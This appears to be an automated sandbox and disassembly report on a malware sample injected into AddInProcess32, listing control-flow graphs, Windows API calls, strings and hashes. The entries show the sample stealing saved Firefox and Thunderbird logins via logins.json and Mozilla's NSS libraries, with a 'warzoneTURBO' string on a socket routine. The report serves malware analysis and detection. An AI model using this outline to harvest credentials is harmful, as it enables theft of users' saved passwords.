6cc92bec-6cc92bf1 1204->1209 1210 6cc92bf3-6cc92c06 1204->1210 1211 6cc929f3-6cc929f6 1205->1211 1212 6cc929d3-6cc929de 1205->1212 1206->1167 1215 6cc92cca-6cc92cd0 1208->1215 1216 6cc92cc1 1208->1216 1217 6cc92c6f-6cc92c8c sqlite3_mutex_enter sqlite3_mutex_leave 1209->1217 1210->1217 1230 6cc92c08-6cc92c16 1210->1230 1211->1167 1218 6cc929e0-6cc929e4 1212->1218 1213->1127 1222 6cc92d4c-6cc92d59 1213->1222 1214->1213 1220 6cc92cdd-6cc92ce0 1215->1220 1221 6cc92cd2-6cc92cdb 1215->1221 1216->1208 1217->1174 1224 6cc929eb-6cc929f1 1218->1224 1225 6cc929e6-6cc929e9 1218->1225 1228 6cc92cf2-6cc92cfd 1220->1228 1229 6cc92ce2-6cc92ce8 1220->1229 1221->1182 1222->1127 1224->1211 1224->1218 1225->1224 1226 6cc92a36-6cc92a58 sqlite3_mutex_leave * 2 sqlite3_free 1225->1226 1226->1143 1233 6cc92cff 1228->1233 1234 6cc92d02 1228->1234 1229->1228 1231 6cc92cea-6cc92cf0 1229->1231 1236 6cc92c18 1230->1236 1237 6cc92c6c 1230->1237 1231->1228 1231->1229 1233->1234 1234->1182 1236->1132 1237->1217
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,00000000), ref: 6CC928DD
                                                                                      • sqlite3_free.NSS3(00000000), ref: 6CC92913
                                                                                      • sqlite3_mutex_enter.NSS3(00000000), ref: 6CC9292D
                                                                                      • sqlite3_mutex_enter.NSS3(00000000), ref: 6CC92950
                                                                                      • sqlite3_mutex_leave.NSS3(?), ref: 6CC929FF
                                                                                      • sqlite3_free.NSS3(?,?), ref: 6CC92A0A
                                                                                      • sqlite3_mutex_leave.NSS3(?), ref: 6CC92A3C
                                                                                      • sqlite3_mutex_leave.NSS3(?,?), ref: 6CC92A45
                                                                                      • sqlite3_free.NSS3(?,?,?), ref: 6CC92A50
                                                                                      • sqlite3_free.NSS3(?), ref: 6CC92A5C
                                                                                      • memset.VCRUNTIME140(?,00000000,00000064,00000000,?,?,?,?,?,?,?,?,00000000), ref: 6CC92AB3
                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6CC92C34
                                                                                      • sqlite3_free.NSS3(?,00000000,?,?,?,?,?,?,00000000), ref: 6CC92C3A
                                                                                      • sqlite3_mutex_leave.NSS3(?,?,?,?,?,?,?,00000000), ref: 6CC92C52
                                                                                      • sqlite3_mutex_enter.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC92C70
                                                                                      • sqlite3_mutex_leave.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC92C86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$memcpymemset
                                                                                      • String ID: :memory:
                                                                                      • API String ID: 1134215365-2920599690
                                                                                      • Opcode ID: 825c2ff02cc01366032ff466fbe28833d1680ca74ff66bff0dd0d5f23f9aa1d3
                                                                                      • Instruction ID: a2416ee076fe408d3886033cb92cc506361b6dceb087115699ad17e0b12ab3d6
                                                                                      • Opcode Fuzzy Hash: 825c2ff02cc01366032ff466fbe28833d1680ca74ff66bff0dd0d5f23f9aa1d3
                                                                                      • Instruction Fuzzy Hash: 8612F271A05206DFEB15CF69C898B99BBB1FF45318F2441ADD4889BB42FB31D981CB90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1238 40a36f-40a3d0 call 4036f7 call 401052 * 2 call 40b87d 1247 40a3d6-40a40f call 4036f7 lstrcatW GetBinaryTypeW 1238->1247 1248 40a8aa-40a8c0 call 405feb * 2 1238->1248 1254 40a411 1247->1254 1255 40a47d-40a47e 1247->1255 1256 40a413-40a425 call 40373f call 40b165 1254->1256 1255->1256 1262 40a8a2-40a8a5 call 405feb 1256->1262 1263 40a42b-40a478 call 40357c call 40373f call 40357c call 4036f7 call 403549 call 405feb call 403384 1256->1263 1262->1248 1279 40a86a-40a88a GetPrivateProfileStringW 1263->1279 1280 40a480-40a4de call 4036f7 call 403549 call 405feb call 403384 call 40373f call 40357c call 403666 call 6ccedc11 1279->1280 1281 40a890-40a89d call 40b10e call 405feb 1279->1281 1300 40a4e0-40a4f0 call 405feb * 2 1280->1300 1301 40a4f5-40a503 1280->1301 1281->1262 1308 40a867 1300->1308 1301->1300 1306 40a505-40a511 1301->1306 1306->1300 1310 40a513-40a581 call 40373f call 40357c call 410c8a call 40357c call 4035b9 call 403447 call 405feb call 40357c 1306->1310 1308->1279 1328 40a592-40a5b8 call 4113ed call 403549 call 4116b1 1310->1328 1329 40a583-40a58f call 403549 1310->1329 1337 40a5bd-40a5c5 1328->1337 1329->1328 1338 40a838-40a864 call 41140c call 405feb * 4 1337->1338 1339 40a5cb-40a622 call 41135c call 4034d1 call 40305d call 40961c call 405feb * 2 1337->1339 1338->1308 1362 40a7f5 1339->1362 1363 40a628-40a62d 1339->1363 1364 40a7f7-40a800 PathFileExistsW 1362->1364 1365 40a630-40a7e7 call 4034d1 call 40305d call 409655 call 405feb * 2 call 4034d1 call 40305d call 409655 call 405feb * 2 call 4034d1 call 40305d call 409655 call 405feb * 2 call 40a8c3 * 2 call 4031af call 403549 call 405feb call 4034d1 call 4031af call 403549 call 405feb * 2 call 4034d1 call 4031af call 403549 call 405feb * 2 call 401ff2 call 402028 call 405feb * 5 call 401441 1363->1365 1366 40a802-40a813 call 40373f call 41142a 1364->1366 1367 40a814-40a832 call 403148 1364->1367 1452 40a7ed-40a7f3 1365->1452 1366->1367 1367->1338 1452->1364
                                                                                      APIs
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                        • Part of subcall function 0040B87D: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\,?,00000104,00000000), ref: 0040B8B9
                                                                                        • Part of subcall function 0040B87D: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040B8C7
                                                                                        • Part of subcall function 0040B87D: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,00409E8E), ref: 0040B8E0
                                                                                        • Part of subcall function 0040B87D: RegQueryValueExW.KERNEL32(00409E8E,Path,00000000,?,?,?), ref: 0040B8FD
                                                                                        • Part of subcall function 0040B87D: RegCloseKey.KERNEL32(00409E8E), ref: 0040B906
                                                                                      • lstrcatW.KERNEL32(?,\firefox.exe,?,?,00000000), ref: 0040A3F1
                                                                                      • GetBinaryTypeW.KERNEL32(?,?), ref: 0040A402
                                                                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,00000001), ref: 0040A882
                                                                                        • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000,00000000,?,?,0041348B,00000000,00000000,00000000,.bss,00000000), ref: 0040356E
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                        • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                                                                        • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,759801C0,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 00403769
                                                                                        • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                                                                        • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                                                                      • CopyFileW.KERNEL32(?,?,00000000,.tmp,00000000,004176A4,\logins.json,00000000), ref: 0040A579
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyDispatcherExceptionFileFreeOpenPrivateProfileQueryStringTypeUserValueVirtualwsprintf
                                                                                      • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini$7Mw
                                                                                      • API String ID: 1388061207-1343845305
                                                                                      • Opcode ID: 566bcde6a6365cfda7b910965f032a507636e0b6ba7d601008335f5d0f1948ed
                                                                                      • Instruction ID: f77f0e27933f91ead54b6ecb8e2b1fb8a7b853b941c5058b019390cbb6b3834b
                                                                                      • Opcode Fuzzy Hash: 566bcde6a6365cfda7b910965f032a507636e0b6ba7d601008335f5d0f1948ed
                                                                                      • Instruction Fuzzy Hash: 7EE1D571900219ABDB14EBA2DC92DEEBB79AF54308F10407FF506771D2DE386A45CB58

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1454 409e2d-409ec7 call 4036f7 call 401052 * 2 call 40b87d call 4036f7 GetBinaryTypeW call 40373f call 40ade3 1469 409ee8-409f39 call 40357c call 40373f call 40357c call 4036f7 call 403549 call 405feb call 403384 1454->1469 1470 409ec9-409ed7 call 40373f call 40ade3 1454->1470 1497 40a31e-40a337 GetPrivateProfileStringW 1469->1497 1478 409edc-409ede 1470->1478 1478->1469 1479 409ee0-409ee3 1478->1479 1481 40a34f-40a36c call 405feb * 3 1479->1481 1498 40a33d-40a34a call 40ad8c call 405feb 1497->1498 1499 409f3e-409f9f call 4036f7 call 403549 call 405feb call 403384 call 40373f call 40357c call 403666 1497->1499 1498->1481 1518 409fa1-409fb1 call 405feb * 2 1499->1518 1519 409fb6-409fc4 1499->1519 1526 40a313-40a319 1518->1526 1519->1518 1524 409fc6-409fd2 1519->1524 1524->1518 1528 409fd4-40a042 call 40373f call 40357c call 410c8a call 40357c call 4035b9 call 403447 call 405feb call 40357c 1524->1528 1526->1497 1546 40a053-40a086 call 4113ed call 403549 call 4116b1 1528->1546 1547 40a044-40a050 call 403549 1528->1547 1556 40a2e7-40a310 call 41140c call 405feb * 4 1546->1556 1557 40a08c-40a0e3 call 41135c call 4034d1 call 40305d call 40961c call 405feb * 2 1546->1557 1547->1546 1556->1526 1580 40a2a4 1557->1580 1581 40a0e9-40a0ee 1557->1581 1582 40a2a6-40a2af PathFileExistsW 1580->1582 1583 40a0f1-40a296 call 4034d1 call 40305d call 409655 call 405feb * 2 call 4034d1 call 40305d call 409655 call 405feb * 2 call 4034d1 call 40305d call 409655 call 405feb * 2 call 40a8c3 * 2 call 4031af call 403549 call 405feb call 4034d1 call 4031af call 403549 call 405feb * 2 call 4034d1 call 4031af call 403549 call 405feb * 2 call 401ff2 call 402028 call 405feb * 3 call 401441 1581->1583 1584 40a2b1-40a2c2 call 40373f call 41142a 1582->1584 1585 40a2c3-40a2e1 call 403148 1582->1585 1666 40a29c-40a2a2 1583->1666 1584->1585 1585->1556 1666->1582
                                                                                      APIs
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                        • Part of subcall function 0040B87D: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\,?,00000104,00000000), ref: 0040B8B9
                                                                                        • Part of subcall function 0040B87D: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040B8C7
                                                                                        • Part of subcall function 0040B87D: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,00409E8E), ref: 0040B8E0
                                                                                        • Part of subcall function 0040B87D: RegQueryValueExW.KERNEL32(00409E8E,Path,00000000,?,?,?), ref: 0040B8FD
                                                                                        • Part of subcall function 0040B87D: RegCloseKey.KERNEL32(00409E8E), ref: 0040B906
                                                                                      • GetBinaryTypeW.KERNEL32(?,0000000B), ref: 00409EAC
                                                                                        • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,759801C0,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 00403769
                                                                                        • Part of subcall function 0040ADE3: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                                                                        • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?), ref: 0040AE1A
                                                                                        • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5,?,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?), ref: 0040AF08
                                                                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,00000001), ref: 0040A32F
                                                                                        • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5,0000005A,.dll,?,00409EC5), ref: 0040AF64
                                                                                        • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,00409EC5), ref: 0040AFA3
                                                                                        • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?), ref: 0040AFAE
                                                                                        • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?), ref: 0040AFB9
                                                                                        • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?), ref: 0040AFC4
                                                                                        • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?), ref: 0040AFCF
                                                                                        • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?), ref: 0040B0BC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$CurrentDirectory$ExistsFilePathlstrcpylstrlen$BinaryCloseDispatcherExceptionOpenPrivateProfileQueryStringTypeUserValuelstrcat
                                                                                      • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe$7Mw
                                                                                      • API String ID: 4293655490-3230999406
                                                                                      • Opcode ID: 8bc5021dd1257b37c6622be44b61c9dbeb43073dce6296a5bd81e4ebe1618fea
                                                                                      • Instruction ID: fb365c449ce7900d484e2c61c5ec7aa39d660c5b142231a0d8c8c55fb7191f8b
                                                                                      • Opcode Fuzzy Hash: 8bc5021dd1257b37c6622be44b61c9dbeb43073dce6296a5bd81e4ebe1618fea
                                                                                      • Instruction Fuzzy Hash: CDE1D671900219ABCB15EBA2DC92DEEBB79AF54308F10407EF506772D2DE386E45CB58
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,$-$Inf$NaN$d
                                                                                      • API String ID: 0-1347984952
                                                                                      • Opcode ID: 4a2da654d26e49186f2e2c40127773a74e655ec8cd57781bb446f4e90b06eb26
                                                                                      • Instruction ID: 28a49841933f19378c549c6942fdea81560b0220f7f0252381662d404267fc82
                                                                                      • Opcode Fuzzy Hash: 4a2da654d26e49186f2e2c40127773a74e655ec8cd57781bb446f4e90b06eb26
                                                                                      • Instruction Fuzzy Hash: 0272D671D0869E8FDB15CFF9886879DBFB5AF46308F24429ED444ABA41E7315887CB40
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 004148C5
                                                                                      • CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?,?,?,?,00414EDE,?,?,?,00414222), ref: 004148E5
                                                                                      • VariantInit.OLEAUT32(?), ref: 00414941
                                                                                      • CoUninitialize.OLE32(?,?,?,00414EDE,?,?,?,00414222), ref: 00414A07
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateInitInitializeInstanceUninitializeVariant
                                                                                      • String ID: "BA$Description$FriendlyName
                                                                                      • API String ID: 4142528535-3217936966
                                                                                      • Opcode ID: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
                                                                                      • Instruction ID: 897dfebaec31b784598ba9d9a56bb6e289364e2dbf67f6d0e24be1ac2d118ec5
                                                                                      • Opcode Fuzzy Hash: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
                                                                                      • Instruction Fuzzy Hash: 62413E74A00245AFCB14DFA5C888DEFBBB9EFC4714B14459EE441EB250DB78DA41CB64
                                                                                      APIs
                                                                                      • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004057B6
                                                                                        • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,759801C0,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                                        • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                                        • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00405806
                                                                                      • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405876
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                                                                      • String ID: `$warzoneTURBO
                                                                                      • API String ID: 3973575906-3455775371
                                                                                      • Opcode ID: f66b568ca4e5e6d61c222f0c80a3f6c0cde62944a04987ca4e338332e4d12aa6
                                                                                      • Instruction ID: 35ac9e55f98b3bce9837d823b4f88ae1208dbfd8d39d165d9c06c2cd8671669a
                                                                                      • Opcode Fuzzy Hash: f66b568ca4e5e6d61c222f0c80a3f6c0cde62944a04987ca4e338332e4d12aa6
                                                                                      • Instruction Fuzzy Hash: 06516E71910118AACB15FF62CC86CEFBB3CEF48755B00417AF815B61D2EA385B45CAA4
                                                                                      APIs
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,004030E2,00405B80,?,?,0041191C,00405B80,?,?,759801C0,00000000,?,00405B80,00000000), ref: 00406048
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,0041191C,00405B80,?,?,759801C0,00000000,?,00405B80,00000000), ref: 0040604F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1357844191-0
                                                                                      • Opcode ID: 23e14b04ba23bb0a7572a9d137d38e85150c57062142801fbe0a0820d84e1829
                                                                                      • Instruction ID: 8cf45ecabbe94aee1392de7f34d48094c70ab4a430d8d374c6facdf70f7c2239
                                                                                      • Opcode Fuzzy Hash: 23e14b04ba23bb0a7572a9d137d38e85150c57062142801fbe0a0820d84e1829
                                                                                      • Instruction Fuzzy Hash: C0A002715541005BDE5467A49F0DF553639B748701F0485947145C5060DBB454458776
                                                                                      APIs
                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6CCCC9BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoSystem
                                                                                      • String ID:
                                                                                      • API String ID: 31276548-0
                                                                                      • Opcode ID: 12eb78d9bbc016c26ef9b3e87e468097e34fea7d1a8e4250c7c451797b6b7b0b
                                                                                      • Instruction ID: 5767b0fefa4cceb4c3cd1a903fac9726f14131602e149dad24cf448e8c1651c2
                                                                                      • Opcode Fuzzy Hash: 12eb78d9bbc016c26ef9b3e87e468097e34fea7d1a8e4250c7c451797b6b7b0b
                                                                                      • Instruction Fuzzy Hash: 54E04671E22248CFDF00EFA88904688BBFCF30A216F000566CA09D3240E63898468B52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78007187c664fe2b21c5d2402a854018bce6746188df8b1805fe44db4e2c4551
                                                                                      • Instruction ID: 82469f1c0b68b0bbf684dc2258c46a30b897b832454fe873a7492cc4e91153ea
                                                                                      • Opcode Fuzzy Hash: 78007187c664fe2b21c5d2402a854018bce6746188df8b1805fe44db4e2c4551
                                                                                      • Instruction Fuzzy Hash: 8021D871E002099BDB11DF99CC82AEFBBB8EF44314F14447BE605FB241E67469C58BA8

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 40b165-40b19d call 401052 GetCurrentDirectoryW 3 40b1a3-40b1a9 0->3 4 40b57d-40b661 SetCurrentDirectoryW call 40357c call 40373f call 40357c call 40373f call 40357c call 40373f call 40357c call 40373f call 40357c call 40373f call 40357c call 40373f call 40357c call 40373f call 40357c call 40373f call 40357c 0->4 5 40b1d7-40b1f1 call 415847 3->5 6 40b1ab-40b1b1 3->6 84 40b663-40b68f call 40373f call 403384 call 40357c PathFileExistsW 4->84 15 40b200-40b40e call 401052 * 6 call 401085 * 6 call 40102c * 6 GetTempPathW SetDllDirectoryW lstrcatW GetTempPathW lstrcatW GetTempPathW lstrcatW GetTempPathW lstrcatW GetTempPathW lstrcatW GetTempPathW lstrcatW 5->15 16 40b1f3-40b1fb call 403148 5->16 6->5 8 40b1b3-40b1b9 6->8 8->5 11 40b1bb-40b1c1 8->11 11->5 14 40b1c3-40b1c9 11->14 14->5 20 40b1cb-40b1d1 14->20 97 40b414-40b419 15->97 98 40b508-40b573 LoadLibraryW * 6 Sleep call 403148 15->98 25 40b86c-40b87a call 405feb 16->25 20->4 20->5 99 40b691-40b6a5 call 405feb 84->99 100 40b6a9-40b6b8 call 403549 call 405feb 84->100 97->98 101 40b41f-40b423 97->101 106 40b578 98->106 99->84 111 40b6a7 99->111 117 40b6bd-40b6bf 100->117 101->98 104 40b429-40b42d 101->104 104->98 108 40b433-40b438 104->108 110 40b79b-40b7a3 106->110 108->98 112 40b43e-40b443 108->112 114 40b7a5-40b7a7 110->114 115 40b7ac-40b86b call 411e88 * 9 SetCurrentDirectoryW 110->115 111->117 112->98 118 40b449-40b44f 112->118 114->25 115->25 122 40b6c0-40b6ec call 40373f call 403384 call 40357c PathFileExistsW 117->122 120 40b451-40b454 118->120 121 40b46d-40b470 118->121 120->121 126 40b456-40b461 call 4133f9 120->126 123 40b472-40b475 121->123 124 40b48a-40b490 121->124 160 40b70a-40b719 call 403549 call 405feb 122->160 161 40b6ee-40b706 call 405feb 122->161 123->124 129 40b477-40b484 call 4133f9 123->129 131 40b492-40b496 124->131 132 40b4ab-40b4b1 124->132 140 40b466-40b46c 126->140 142 40b489 129->142 131->132 137 40b498-40b4a5 call 4133f9 131->137 138 40b4b3-40b4b7 132->138 139 40b4cc-40b4cf 132->139 152 40b4aa 137->152 138->139 145 40b4b9-40b4c6 call 4133f9 138->145 146 40b4d1-40b4d5 139->146 147 40b4ea-40b4ed 139->147 140->121 142->124 158 40b4cb 145->158 146->147 148 40b4d7-40b4e4 call 4133f9 146->148 147->98 150 40b4ef-40b4f3 147->150 159 40b4e9 148->159 150->98 156 40b4f5-40b502 call 4133f9 150->156 152->132 165 40b507 156->165 158->139 159->147 174 40b71e-40b796 LoadLibraryW * 5 call 405feb * 8 160->174 161->122 171 40b708 161->171 165->98 171->174 174->110
                                                                                      APIs
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,?,00000000), ref: 0040B193
                                                                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040B35A
                                                                                      • SetDllDirectoryW.KERNEL32(?), ref: 0040B363
                                                                                      • lstrcatW.KERNEL32(?,softokn3.dll), ref: 0040B37B
                                                                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040B389
                                                                                      • lstrcatW.KERNEL32(?,msvcp140.dll), ref: 0040B397
                                                                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040B3A5
                                                                                      • lstrcatW.KERNEL32(?,mozglue.dll), ref: 0040B3B3
                                                                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040B3C1
                                                                                      • lstrcatW.KERNEL32(?,vcruntime140.dll), ref: 0040B3CF
                                                                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040B3DD
                                                                                      • lstrcatW.KERNEL32(?,freebl3.dll), ref: 0040B3EB
                                                                                      • GetTempPathW.KERNEL32(00000100,?), ref: 0040B3F9
                                                                                      • lstrcatW.KERNEL32(?,nss3.dll), ref: 0040B407
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040B515
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040B524
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040B533
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040B542
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040B551
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040B560
                                                                                      • Sleep.KERNEL32(00000064), ref: 0040B56A
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0040B580
                                                                                      • PathFileExistsW.SHLWAPI(00000001,0000005A,.dll,?,msvcr,?,msvcp,?,vcruntime140.dll,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?), ref: 0040B687
                                                                                      • PathFileExistsW.SHLWAPI(00000001,0000005A,.dll,?,00000001), ref: 0040B6E4
                                                                                      • LoadLibraryW.KERNEL32(?,00000001), ref: 0040B727
